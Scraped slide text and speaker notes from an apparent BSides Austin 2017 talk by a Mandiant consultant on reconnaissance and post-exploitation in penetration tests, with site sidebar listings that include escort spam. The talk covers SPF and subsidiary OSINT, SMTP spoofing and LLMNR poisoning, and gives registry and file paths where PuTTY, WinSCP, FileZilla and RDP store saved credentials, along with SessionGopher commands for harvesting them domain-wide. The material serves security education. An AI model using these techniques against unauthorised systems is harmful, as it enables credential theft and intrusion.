Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
Dafgjgghhghfhjgghjhgy06-Footprinting.pptxDafgjgghhghfhjgghjhgy06-Footprinting.pptx
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
UKC - Feb 2013 - Analyzing the security of Windows 7 and Linux for cloud comp...
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 

Recently uploaded

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 

Recently uploaded (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 

Breadcrumbs to Loaves: BSides Austin '17

  • 1. Copyright © FireEye, Inc. All rights reserved.1 Brandon Arvanaghi @arvanaghi Breadcrumbs to LoavesHow Tidbits of Information Lead Us to Full-Scale Compromise
  • 2. Copyright © FireEye, Inc. All rights reserved.2 Brandon Arvanaghi (@arvanaghi) • Security Consultant at Mandiant • Webshell detection, post-exploitation, sandbox detection tools • Researched automated attack plan generation at Vanderbilt University
  • 3. Copyright © FireEye, Inc. All rights reserved.3 Breadcrumbs • Small, seemingly benign or irrelevant pieces of information that can lead to major exploitation • Types of breadcrumbs: • Open Source Intelligence Gathering (OSINT)/External • Wireless • Internal (physical connection connection) • Post-exploitation – Bulk of Talk • SessionGopher – tool I developed to discover Unix systems and jump boxes https://github.com/fireeye/SessionGopher
  • 4. Copyright © FireEye, Inc. All rights reserved.4 OSINT/EXTERNAL BREADCRUMBS
  • 5. Copyright © FireEye, Inc. All rights reserved.5 Crumb #1: SPF Records • Sender Policy Framework • You own example.com • Problem: Spoofing emails from @example.com is easily done by creating a mail server and modifying headers • Solution: SPF record at example.com’s DNS zone. Says “you should only see emails from @example.com from the following IP addresses: ….” • Recipients now automatically check with example.com’s DNS servers if email’s source IP is in SPF record
  • 6. Copyright © FireEye, Inc. All rights reserved.6 Crumb #1: SPF Records • As an attacker, SPF records provide insight into third parties • Sometimes, companies want third parties to be able to send mail on their behalf • E.g. example of LinkedIn trusting DocuSign to send emails from https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf- records • https://hackertarget.com/quietly-mapping-the-network-attack-surface/
  • 7. Copyright © FireEye, Inc. All rights reserved.7 Crumb #2: Subsidiaries • Company only as strong as its weakest link • Mergers and Acquisitions • Due diligence • Cyber insurance
  • 8. Copyright © FireEye, Inc. All rights reserved.8
  • 9.
  • 10.
  • 11. Crumb #3: Unauthenticated SMTP Server • If port 25 (SMTP) is open on a remote host, you may be able to send unauthenticated mail from that server to internal employees • Without authentication, you can spoof any internal email address! http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp- commands-via-gmail
  • 12. Copyright © FireEye, Inc. All rights reserved.12 INTERNAL BREADCRUMBS
  • 13. Copyright © FireEye, Inc. All rights reserved.13 Crumb #1: LLMNR • LLMNR = Link-Local Multicast Name Resolution • Hosts on the same link (subnet) can resolve DNS queries, as opposed to just relying on DNS server • Peer-to-peer, decentralized • Fast • Multicast • Implicitly trust everyone • Responder by SpiderLabs
  • 14. Unicast Example I’m a PC DNSStandard DNS query
  • 15. Unicast Example DNS 10.0.30.15 Standard DNS query 10.0.30.15 Great! I’m coming to: I’m a PC
  • 16. Unicast Example DNS 10.0.30.15 Standard DNS query 10.0.30.15 ✅I’m a PC
  • 17. Multicast Example LLMNR Hi everyone! Where’s confluence.corp.com? That’s me! 10.1.40.15, come over! 10.1.40.15 I’m a PC
  • 18. Multicast Example LLMNR 10.1.40.15 I’m a PC 10.1.40.15 Great! I’m coming to:
  • 20. Copyright © FireEye, Inc. All rights reserved.20 Crumb #2: IT HelpDesk/Intranet • Company helpdesk sites often lack authentication • Real examples from engagements: • “Our point of sale terminals can be accessed from Win7-Client1, Win7-Client2, and Win7-Client3” • Excel file storing Unix system passwords
  • 21. Copyright © FireEye, Inc. All rights reserved.21 Crumb #2: IT HelpDesk/Intranet 1. Nmap scan across subnets 2. Run EyeWitness by Christopher Truncer
  • 22. Copyright © FireEye, Inc. All rights reserved.22 Crumb #3: Anonymous Shares • Publically available shared folders that do not require any form of authentication • Often out of perceived necessity • Contractors, vendors • Result: plaintext password files
  • 23. Copyright © FireEye, Inc. All rights reserved.23 Crumb #4: When Hostnames Make Sense • Use PowerView or ADExplorer to get lists of hostnames • Nonintrusive way to understand the role of each system without doing Nmap scans • SQLWIN7.CORP.COM • MAIL01.CORP.COM • MEDIA-BKUP.CORP.COM
  • 24. Copyright © FireEye, Inc. All rights reserved.24 WIRELESS BREADCRUMBS
  • 25. Copyright © FireEye, Inc. All rights reserved.25 Crumb #1: Guest Network Host Visibility • Guest networks should be segregated. This is not always done properly. • Visible hosts with visible services can lead to lateral movement onto corporate network • Pivot!
  • 26. Copyright © FireEye, Inc. All rights reserved.26 Crumb #2: Remembered Networks • Your device probes for every single access point it remembers having associated • Yells out known SSID names indiscriminately • WiFi Pineapple responds any probe, automatically connecting you • Direct your traffic to internet while reading all unencrypted traffic • Quietly changing HTTPS requests to HTTP
  • 27. Copyright © FireEye, Inc. All rights reserved.27 Remembered Networks: Real Mandiant Engagement
  • 28. Copyright © FireEye, Inc. All rights reserved.28 Remembered Networks: Real Mandiant Engagement
  • 29. Copyright © FireEye, Inc. All rights reserved.29 Remembered Networks: Real Mandiant Engagement associated!
  • 30. Copyright © FireEye, Inc. All rights reserved.30 Remembered Networks: Real Mandiant Engagement associated! Visible to two different networks PsExec, WMIExec, etc.
  • 31. 31
  • 32. Copyright © FireEye, Inc. All rights reserved.32 POST-EXPLOITATION SessionGopher: Finding Unix Systems and Jump Boxes https://github.com/fireeye/SessionGopher
  • 33. Copyright © FireEye, Inc. All rights reserved.33 The Registry • On many engagements, consultants are tasked with exploiting Unix systems • Intellectual property on Macbook Pros • Point of sale terminals running Linux • Etc. • Often not domain-joined! • Would be so much easier if they were • Use PowerView • How can we find & exploit them?
  • 34. Copyright © FireEye, Inc. All rights reserved.34 The Registry • Current methodology 1. Nmap for live hosts not found in Active Directory a. Open Unix ports 2. netstat domain-joined systems, look for active connections over Unix ports 3. Search Active Directory for groups like “Linux Admins” & “Mac Admins” a. Find their members’ workstations, active sessions • Methodology relies on luck and active sessions. Better way?
  • 35. Copyright © FireEye, Inc. All rights reserved.35 The Registry • HKEY_USERS • Persistent storage of saved session for any user who has logged in! • Users don’t have to be currently logged in • Though Unix systems not domain-joined, they are often managed by domain-joined Windows systems • Valuable artifacts on these hosts • Solves our “active session” problem • But what can we find in this magical hive that helps us exploit Unix systems?
  • 36. Copyright © FireEye, Inc. All rights reserved.36 The Registry
  • 37. Copyright © FireEye, Inc. All rights reserved.37 Solution 1. Find artifacts left by tools typically used to access Unix systems. 2. If they exist, then saved sessions might exist. Extract ’em.
  • 38. Copyright © FireEye, Inc. All rights reserved.38 Tools • WinSCP • FileZilla • PuTTY • SuperPuTTY • VNC • RDP • More!
  • 39. Copyright © FireEye, Inc. All rights reserved.39 Paths to Sessions Stored in Registry • PuTTY • HKEY_USERS<SID>SOFTWARESimonTathamPuTTYSessions • WinSCP • HKEY_USERS<SID>SOFTWAREMartin PrikrylWinSCP 2Sessions • Microsoft Remote Desktop • HKEY_USERS<SID> SOFTWAREMicrosoftTerminal Server ClientServers Non-registry (assumes filename/location unchanged) • FileZilla • <Drive>:Users<Username>AppDataRoamingFileZillasitemanager.xml • SuperPuTTY • <Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml
  • 40. Copyright © FireEye, Inc. All rights reserved.40 WinSCP HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2Sessions<SessionName> HKEY_USERS<SID>SoftwareMartin PrikrylWinSCP 2ConfigurationSecurity
  • 41. Copyright © FireEye, Inc. All rights reserved.41
  • 42. Copyright © FireEye, Inc. All rights reserved.42 WinSCP
  • 43. Copyright © FireEye, Inc. All rights reserved.43 Paths to Sessions • HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault • HKEY_USERS<SID>SOFTWAREMicrosoftTerminal Server ClientDefault
  • 44. Copyright © FireEye, Inc. All rights reserved.44 FileZilla <Drive>:Users<Username>AppDataRoamingFileZillaSiteManager.xml
  • 45. Copyright © FireEye, Inc. All rights reserved.45 SuperPuTTY <Drive>:Users<Username>DocumentsSuperPuTTYSessions.xml • ExtraArgs field can contain plaintext password
  • 46. Copyright © FireEye, Inc. All rights reserved.46 PuTTY .ppk Files • One-click PuTTY logins • Key can be plaintext (as in here) or encrypted
  • 47. Copyright © FireEye, Inc. All rights reserved.47 Microsoft .rdp Files • Executable, can be read by dragging into text editor • Plethora of arguments, many optional • Host, if admin, prompt for credentials, etc. • Fieldname:TypeOfField:Value • TypeOfField = Integer or String
  • 48. Copyright © FireEye, Inc. All rights reserved.48
  • 49. Copyright © FireEye, Inc. All rights reserved.49
  • 50. Copyright © FireEye, Inc. All rights reserved.50 Windows Management Instrumentation (WMI) • Rather than running SessionGopher on each computer (impractical), we can use WMI • Built-in “Invoke-WmiMethod” command in PowerShell • Remote registry querying ability
  • 51. Copyright © FireEye, Inc. All rights reserved.51
  • 52. Copyright © FireEye, Inc. All rights reserved.52 Write to CSV (Invoke-SessionGopher –o) • Create a physical mapping of the network • Aggregate all session data across entire domain or targeted computers • Essentially, see the physical infrastructure of network!
  • 53. Copyright © FireEye, Inc. All rights reserved.53 QUESTIONS? Twitter: @arvanaghi Github: https://github.com/fireeye/SessionGopher Brandon Arvanaghi

Editor's Notes

  1. SessionGopher: https://github.com/fireeye/SessionGopher
  2. https://community.rapid7.com/community/infosec/blog/2015/02/23/osint-through-sender-policy-framework-spf-records The receiving mail server automatically checks the SPF record for the domain, if they exist.
  3. Social engineering opportunities arise from seeing third-party relationships all from a DNS record!
  4. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
  5. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries.
  6. SEC form 10-K, exhibit 21. Form that discloses a company’s subsidiaries. Primary target for attacking a large organization: small, lesser-known subsidiaries.
  7. Command-line syntax: HELO <domain>  prepares the SMTP server for use MAIL FROM <email address>  Mail sender RCPT TO <email address>  Mail recipient DATA  Message headers from, to, subject, and content. Image source: http://stackoverflow.com/questions/11046135/how-to-send-email-using-simple-smtp-commands-via-gmail
  8. Source: http://www.myintranetdashboard.com/graphics/screen2b.gif
  9. EyeWitness by Christopher Truncer: https://github.com/ChrisTruncer/EyeWitness EyeWitness automatically screenshots all HTTP/HTTPs ports discovered from Nmap for you, and makes an attempt at classifying the kind of site it is. When EyeWitness recognizes a credentialed page, it will provide you default credentials typically used for that service. Photo taken from https://www.christophertruncer.com/eyewitness-triage-tool/
  10. Wired-in network on the left with Ethernet. These hosts should, in theory, not be visible to any system not physically connected to their network. Security guards at the door, physical access controls, monitoring all wall ports, etc.
  11. On one of our engagements, we saw the physically-connected computers were still probing for remembered SSIDs because they had their WiFi turned on. Most people do not turn off their WiFi even when they are wired in, which can make them visible to the outside world!
  12. We spoofed the “gogoinflight” SSID and established an association between our TP-Link access point and the system. Now, we could see the system on our own spoofed subnet, see what services it was running, and tools against it.
  13. By running Responder or a social engineering campaign, we could use PsExec or WMIExec to exploit that system from our new subnet. Once we’ve gained access to that system, we could pivot to the wired internal network, since it is dual-homed! Essentially, we get access to the same wired-in benefits as any system physically connected. Despite this company not having any remote portal access or VPN, this physical security measure failed due to keeping WiFi enabled.
  14. System Preferences  Network  Advanced Used to be such that a more “preferred” association would make you drop your current association! E.g. if you are connected to CompanyWiFi, but had gogoinflight as a more preferred network and a gogoinflight SSID appeared, your system would automatically switch!
  15. https://github.com/fireeye/SessionGopher
  16. SID structure: S-1-5-21-Domain-User Query all these for domain users who have logged on! The Registry has both volatile and static data. As an example, HKEY_LOCAL_MACHINE\HARDWARE fills its subkeys at boot time after analyzing the hardware under the Windows system. HKEY_USERS has persistent information about domain users who have logged onto a system. HKEY_CURRENT_USER is actually a symlink to the HKEY_USERS subkey of the currently logged in user!
  17. Persistent artifacts from all these tools can help get a network mapping not just for Unix systems, but also jump boxes. Jump boxes can be difficult to find, but when extracting all saved RDP sessions from each host, you can see to where these servers RDP. Once you find a saved RDP session with a hostname you know to be a segmented environment, you know which server can communicate with that host!
  18. The saved password string above for WinSCP sessions is not encrypted by default. That is obfuscation, and it is easily reversible. The “key” is the session hostname + username. The password will only be encrypted when the “UseMastrPassword” value in the second registry subkey is set to 1. If this is set, then you can only extract the encrypted password, and attempt to bruteforce it.
  19. As seen here, WinSCP’s password obfuscation algorithm uses a sequence of bitwise operation that is xor’d with a magic value. The password obfuscation algorithm has been reverse engineered across several languages, but never before in PowerShell.
  20. SessionGopher’s built-in WinSCP deobfuscator
  21. HKEY_USERS\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Default contains most recent RDP attempts
  22. FileZilla stores its password in an XML file, not in the registry. By default, the saved password is only base-64 encoded, and not encrypted.
  23. SuperPuTTY is used to manage simultaneous PuTTY sessions, and has the added benefit of storing passwords for one-click SSH sessions. PuTTY does not store passwords, so many clients use SuperPuTTY as a wrapper. SuperPuTTY sessions are saved in a Sessions.xml file, and not in the registry. The password gets placed in the “ExtraArgs” argument, which can contain a multitude of additiona arguments. SuperPuTTY interprets anything following ”-pw” as the password argument for the SSH session.
  24. Stored sessions as .rdp files can be used for one-click logins. These files are executable and can also be dragged into a text editor like Sublime Text and read.
  25. SessionGopher synthesizes the .ppk and .rdp files and makes sense of them. It return the private key, private MAC, and whether or not the key is encrypted.
  26. . .\SessionGopher.ps1 Invoke-SessionGopher -Thorough
  27. Invoke-WmiMethod allows you to use WMI to read the remote registry of a different system using the –Class ‘StdRegProv’. From your own attack computer connected to the network, you can read the persistent registry artifacts of HKEY_USERS for each box using WMI. Quiet, quick, and effective!
  28. Invoke-SessionGopher –iL inputlist.txt Invoke-SessionGopher –AllDomain Invoke-SessionGopher –Target winbox.company.com After running SessionGopher across a domain or set of computers, you will essentially have a network mapping of the entire corporate infrastructure! Jump boxes, Unix systems, and other non-domain hosts should all be revealed to you along with the path to get there.